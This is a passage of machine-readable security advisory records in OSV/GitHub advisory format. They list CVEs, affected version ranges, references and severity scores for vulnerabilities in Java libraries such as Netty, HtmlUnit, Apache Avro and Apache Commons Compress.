"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2156" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3748/commits/4ac519f534493bb0ca7a77e1c779138a54faa7b9" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3754" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2caa38a2795fe1f1ae6ceda4d69e826ed7c55e55" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/31815598a2af37f0b71ea94eada70d6659c23752" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222923" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a19bb1003b0d6cd22475ba83c019b4fc7facfef2a9e13f71132529d3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc1275aef115bda172851a231c76c0932d973f9ffd8bc375c4aba769@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-IONETTY-73571" }, { "type": "WEB", "url": "https://www.playframework.com/security/vulnerability/CVE-2015-2156-HttpOnlyBypass" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159379.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159166.html" }, { "type": "WEB", "url": "http://netty.io/news/2015/05/08/3-9-8-Final-and-3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/05/17/1" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/74704" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:59:55Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3xrr-7m6p-p7xh", "published": "2023-07-06T19:24:13Z", "modified": "2024-02-17T05:32:04.097962Z", "aliases": [ "CVE-2023-26119" ], "summary": "HtmlUnit Code Injection vulnerability", "details": "Versions of the package `net.sourceforge.htmlunit:htmlunit` from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.14", "2.0", "2.1", "2.1.5", "2.10", "2.11", "2.12", "2.13", "2.14", "2.15", "2.16", "2.17", "2.18", "2.19", "2.2", "2.20", "2.21", "2.22", "2.23", "2.24", "2.25", "2.26", "2.27", "2.28", "2.29", "2.3", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.34.1", "2.35.0", "2.36.0", "2.37.0", "2.38.0", "2.39.0", "2.39.1", "2.4", "2.40.0", "2.41.0", "2.42.0", "2.43.0", "2.44.0", "2.45.0", "2.46.0", "2.47.0", "2.47.1", "2.48.0", "2.49.0", "2.49.1", "2.5", "2.50.0", "2.51.0", "2.52.0", "2.53.0", "2.54.0", "2.55.0", "2.56.0", "2.57.0", "2.58.0", "2.59.0", "2.6", "2.60.0", "2.61.0", "2.62.0", "2.63.0", "2.64.0", "2.65.0", "2.65.1", "2.66.0", "2.67.0", "2.68.0", "2.69.0", "2.7", "2.70.0", "2.8", "2.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-3xrr-7m6p-p7xh/GHSA-3xrr-7m6p-p7xh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26119" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/commit/641325bbc84702dc9800ec7037aec061ce21956b" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEHTMLUNIT-3252500" }, { "type": "WEB", "url": "https://siebene.github.io/2022/12/30/HtmlUnit-RCE" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T22:00:23Z", "nvd_published_at": "2023-04-03T05:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mh9-r3rr-9597", "published": "2020-05-21T21:08:33Z", "modified": "2024-10-15T23:41:37.767130Z", "aliases": [ "CVE-2020-5529" ], "summary": "Code execution vulnerability in HtmlUnit", "details": "HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application. ", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.37.0" } ] } ], "versions": [ "1.14", "2.0", "2.1", "2.1.5", "2.10", "2.11", "2.12", "2.13", "2.14", "2.15", "2.16", "2.17", "2.18", "2.19", "2.2", "2.20", "2.21", "2.22", "2.23", "2.24", "2.25", "2.26", "2.27", "2.28", "2.29", "2.3", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.34.1", "2.35.0", "2.36.0", "2.4", "2.5", "2.6", "2.7", "2.8", "2.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-5mh9-r3rr-9597/GHSA-5mh9-r3rr-9597.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5529" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/commit/bc1f58d483cc8854a9c4c1739abd5e04a2eb0367" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit/releases/tag/2.37.0" }, { "type": "WEB", "url": "https://jvn.jp/en/jp/JVN34535327" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2cd7f8e61dc6b8a2d9065094cd1f46aa63ad10f237ee363e26e8563%40%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2cd7f8e61dc6b8a2d9065094cd1f46aa63ad10f237ee363e26e8563@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00023.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4584-1" } ], "database_specific": { "cwe_ids": [ "CWE-665", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2020-05-21T17:25:38Z", "nvd_published_at": "2020-02-11T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6jmm-mp6w-4rrg", "published": "2022-04-26T21:14:57Z", "modified": "2023-11-08T04:09:13.642010Z", "aliases": [ "CVE-2022-29546" ], "related": [ "CVE-2022-29546" ], "summary": "OutOfMemory Exception by specifically crafted processing instruction in NekoHtml Parser", "details": "### Impact\nNekoHtml Parser suffers from a denial of service vulnerability on versions 2.60.0 and below. A specifically crafted input regarding the parsing of processing instructions leads to heap memory consumption. Please update to version 2.61.0.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [https://github.com/HtmlUnit/htmlunit-neko](https://github.com/HtmlUnit/htmlunit-neko)\n* Email us at [rbri at rbri.de]\n", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:neko-htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/neko-htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.61.0" } ] } ], "versions": [ "2.21", "2.23", "2.24", "2.25", "2.27", "2.28", "2.30", "2.31", "2.32", "2.33", "2.34.0", "2.35.0", "2.36.0", "2.37.0", "2.38.0", "2.39.0", "2.40.0", "2.41.0", "2.42.0", "2.43.0", "2.44.0", "2.45.0", "2.46.0", "2.47.0", "2.47.1", "2.48.0", "2.49.0", "2.50.0", "2.51.0", "2.52.0", "2.53.0", "2.54.0", "2.55.0", "2.56.0", "2.57.0", "2.58.0", "2.59.0", "2.60.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-6jmm-mp6w-4rrg/GHSA-6jmm-mp6w-4rrg.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit-neko/security/advisories/GHSA-6jmm-mp6w-4rrg" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29546" }, { "type": "WEB", "url": "https://github.com/HtmlUnit/htmlunit-neko/commit/9d2aecd69223469e40c12ca3edddda09009110cc" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit-neko" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-04-26T21:14:57Z", "nvd_published_at": "2022-04-25T03:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g9hh-vvx3-v37v", "published": "2022-04-23T00:03:04Z", "modified": "2024-12-05T05:41:29.184965Z", "aliases": [ "CVE-2022-28366" ], "summary": "Denial of service in HtmlUnit-Neko", "details": "Certain Neko-related HTML parsers allow a denial of service via crafted Processing Instruction (PI) input that causes excessive heap memory consumption. In particular, this issue exists in HtmlUnit-Neko through 2.26, and is fixed in 2.27. This issue also exists in CyberNeko HTML through 1.9.22 (also affecting OWASP AntiSamy before 1.6.6), but 1.9.22 is the last version of CyberNeko HTML. NOTE: this may be related to CVE-2022-24939.", "affected": [ { "package": { "name": "net.sourceforge.htmlunit:neko-htmlunit", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.htmlunit/neko-htmlunit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.27" } ] } ], "versions": [ "2.21", "2.23", "2.24", "2.25" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-g9hh-vvx3-v37v/GHSA-g9hh-vvx3-v37v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28366" }, { "type": "PACKAGE", "url": "https://github.com/HtmlUnit/htmlunit-neko" }, { "type": "WEB", "url": "https://github.com/nahsra/antisamy/releases/tag/v1.6.6" }, { "type": "WEB", "url": "https://search.maven.org/artifact/net.sourceforge.htmlunit/neko-htmlunit" }, { "type": "WEB", "url": "https://sourceforge.net/projects/htmlunit/files/htmlunit/2.27" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2022-04-26T20:12:38Z", "nvd_published_at": "2022-04-21T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r7pg-v2c8-mfg3", "published": "2024-10-03T12:30:48Z", "modified": "2025-07-10T23:44:42.719245Z", "aliases": [ "CVE-2024-47561" ], "related": [ "CGA-24wg-f7c9-6234", "CGA-6hqm-x64f-4f58", "CGA-6pm2-j37h-3fvw", "CGA-6pm4-w9vr-cj5w", "CGA-j4wj-mh37-jf86", "CGA-r5wx-5789-jqwq" ], "summary": "Apache Avro Java SDK: Arbitrary Code Execution when reading Avro Data (Java SDK)", "details": "Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code.\nUsers are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue.", "affected": [ { "package": { "name": "org.apache.avro:avro", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.avro/avro" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.4" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.8.0", "1.8.1", "1.8.2", "1.9.0", "1.9.1", "1.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-r7pg-v2c8-mfg3/GHSA-r7pg-v2c8-mfg3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47561" }, { "type": "WEB", "url": "https://github.com/apache/avro/pull/2934" }, { "type": "WEB", "url": "https://github.com/apache/avro/pull/2980" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/8f89868d29272e3afea2ff8de8c85cb81a57d900" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/f6b3bd7e50e6e09fedddb98c61558c022ba31285" }, { "type": "PACKAGE", "url": "https://github.com/apache/avro" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/AVRO-3985" }, { "type": "WEB", "url": "https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241011-0003" }, { "type": "WEB", "url": "https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2024/10/03/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/10/03/1" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2024-10-03T16:52:52Z", "nvd_published_at": "2024-10-03T11:15:13Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhrv-645h-fjfh", "published": "2023-09-29T18:30:22Z", "modified": "2025-07-31T14:37:21.698951Z", "aliases": [ "CVE-2023-39410", "PYSEC-2023-188" ], "related": [ "CGA-8q34-h6rx-rrwj", "CGA-x2r8-2m8h-66gj" ], "summary": "Apache Avro Java SDK vulnerable to Improper Input Validation", "details": "When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints and thus lead to out of memory on the system.\n\nThis issue affects Java applications using Apache Avro Java SDK up to and including 1.11.2. Users should update to apache-avro version 1.11.3 which addresses this issue.", "affected": [ { "package": { "name": "org.apache.avro:avro", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.avro/avro" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.3" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.8.0", "1.8.1", "1.8.2", "1.9.0", "1.9.1", "1.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39410" }, { "type": "WEB", "url": "https://github.com/apache/avro/commit/a12a7e44ddbe060c3dc731863cad5c15f9267828" }, { "type": "PACKAGE", "url": "https://github.com/apache/avro" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/avro/PYSEC-2023-188.yaml" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/AVRO-3819" }, { "type": "WEB", "url": "https://lists.apache.org/thread/q142wj99cwdd0jo5lvdoxzoymlqyjdds" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/09/29/6" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/09/29/6" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2023-09-29T22:06:14Z", "nvd_published_at": "2023-09-29T17:15:46Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4265-ccf5-phj5", "published": "2024-02-19T09:30:52Z", "modified": "2025-02-13T19:35:45.384593Z", "aliases": [ "CGA-9f5h-57xr-g74j", "CVE-2024-26308" ], "related": [ "CGA-4qfq-4jjg-v7x8", "CGA-5jhg-gjx7-pq4m", "CGA-96mq-j5w6-4gc5", "CGA-cm9w-hfx3-j2p6", "CGA-ggv5-qcv7-p79c", "CGA-gjfq-fj8p-3fpm", "CGA-gp4f-pvwr-2rc6", "CGA-j2pm-vhxf-h6gg", "CGA-ppj7-32h7-rr4m", "CGA-rq5c-r89h-7gmf", "CGA-x85q-h487-67fx" ], "summary": "Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.21 before 1.26.\n\nUsers are recommended to upgrade to version 1.26, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.21" }, { "fixed": "1.26.0" } ] } ], "versions": [ "1.21", "1.22", "1.23.0", "1.24.0", "1.25.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-4265-ccf5-phj5/GHSA-4265-ccf5-phj5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26308" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240307-0009" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/02/19/2" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-02-20T23:59:29Z", "nvd_published_at": "2024-02-19T09:15:38Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4g9r-vxhx-9pgx", "published": "2024-02-19T09:30:50Z", "modified": "2025-11-04T21:07:59.755805Z", "aliases": [ "CGA-6rmf-ffqm-f8vv", "CVE-2024-25710" ], "related": [ "CGA-2xg7-8qm4-vx87", "CGA-3wh2-6f5w-rxm4", "CGA-679f-cjh5-5f6q", "CGA-86rr-9236-xpq3", "CGA-f3gh-9fhg-9hjp", "CGA-gr35-gp4q-q78f", "CGA-gxfq-hm2x-69x4", "CGA-hw3c-xmgp-wcw7", "CGA-jx86-68h8-6jqw", "CGA-qm27-j3j5-mwr9", "CGA-w8q8-p4r5-xxg9" ], "summary": "Apache Commons Compress: Denial of service caused by an infinite loop for a corrupted DUMP file", "details": "Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress. This issue affects Apache Commons Compress: from 1.3 through 1.25.0.\n\nUsers are recommended to upgrade to version 1.26.0 which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.3" }, { "fixed": "1.26.0" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23.0", "1.24.0", "1.25.0", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-4g9r-vxhx-9pgx/GHSA-4g9r-vxhx-9pgx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25710" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240307-0010" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Aug/37" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/02/19/1" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2024-02-20T23:58:47Z", "nvd_published_at": "2024-02-19T09:15:37Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-53x6-4x5p-rrvv", "published": "2019-10-11T18:41:08Z", "modified": "2024-03-16T05:19:51.255480Z", "aliases": [ "CVE-2019-12402" ], "summary": "Denial of Service in Apache Commons Compress", "details": "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.15" }, { "fixed": "1.19" } ] } ], "versions": [ "1.15", "1.16", "1.16.1", "1.17", "1.18" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-53x6-4x5p-rrvv/GHSA-53x6-4x5p-rrvv.json" } }, { "package": { "name": "io.github.1tchy.java9modular.org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/io.github.1tchy.java9modular.org.apache.commons/commons-compress" }, "versions": [ "1.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-53x6-4x5p-rrvv/GHSA-53x6-4x5p-rrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12402" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0001" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53@%3Cdev.brooklyn.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2019-12402" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2019-09-30T09:39:36Z", "nvd_published_at": "2019-08-30T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6fxm-66hq-fc96", "published": "2022-05-13T01:07:05Z", "modified": "2024-11-28T05:48:23.160032Z", "aliases": [ "CVE-2012-2098" ], "summary": "Uncontrolled Resource Consumption in Apache Commons Compress", "details": "Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.", "affected": [ { "package": { "name": 